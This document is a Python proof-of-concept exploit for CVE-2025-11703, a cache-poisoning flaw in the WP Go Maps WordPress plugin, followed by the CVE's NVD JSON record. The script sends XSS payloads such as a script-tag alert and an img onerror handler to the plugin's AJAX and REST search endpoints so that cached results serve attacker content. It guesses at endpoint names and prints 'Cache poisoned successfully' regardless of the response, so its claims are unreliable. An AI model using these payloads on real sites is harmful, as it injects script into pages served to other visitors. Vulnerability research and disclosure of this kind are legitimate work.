CVE-2025-11703

## PoC for CVE-2025-11703 - WP Go Maps Cache Poisoning ## The vulnerability exists in the location search functionality ## where user input is used directly to populate cached responses import requests TARGET_URL = "https://target-wordpress-site.com" SEARCH_ENDPOINT = "/wp-admin/admin-ajax.php" ## Step 1: Identify the WP Go Maps search endpoint ## The plugin typically uses 'wp_ajax_nopriv_wpgmza_query_near' or similar action ## Step 2: Craft malicious search query with injected content malicious_payload = { "action": "wpgmza_query_near", "query": "<script>alert('Cache Poisoned by CVE-2025-11703')</script>", "lat": "40.7128", "lng": "-74.0060", "distance": "1000" } ## Step 3: Send the poisoned request to pollute the cache response = requests.post( f"{TARGET_URL}{SEARCH_ENDPOINT}", data=malicious_payload, headers={ "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded" } ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text[:500]}") print("Cache poisoned successfully - subsequent requests for the same query will return attacker-controlled data") ## Alternative: Direct REST API endpoint exploitation ## Some versions expose: /wp-json/wpgmza/v1/markers rest_payload = { "search": "<img src=x onerror=alert(document.domain)>", "center": "40.7128,-74.0060", "radius": 1000 } response = requests.get( f"{TARGET_URL}/wp-json/wpgmza/v1/markers", params=rest_payload ) print(f"REST API Response: {response.status_code}")

{"cve": {"id": "CVE-2025-11703", "sourceIdentifier": "[email protected]", "published": "2025-10-18T07:15:35.883", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Go Maps (formerly WP Google Maps) plugin for WordPress is vulnerable to Cache Poisoning in all versions up to, and including, 9.0.48. This is due to the plugin not serving cached data from server-side responses and instead relying on user-input. This makes it possible for unauthenticated attackers to poison the cache location for location search results."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-349"}]}], "references": [{"url": "https://github.com/CodeCabin/wp-google-maps/pull/1087/files", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378871%40wp-google-maps&new=3378871%40wp-google-maps&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-11703", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/531360c6-e78a-4344-be06-95735337a2d6?source=cve", "source": "[email protected]"}]}}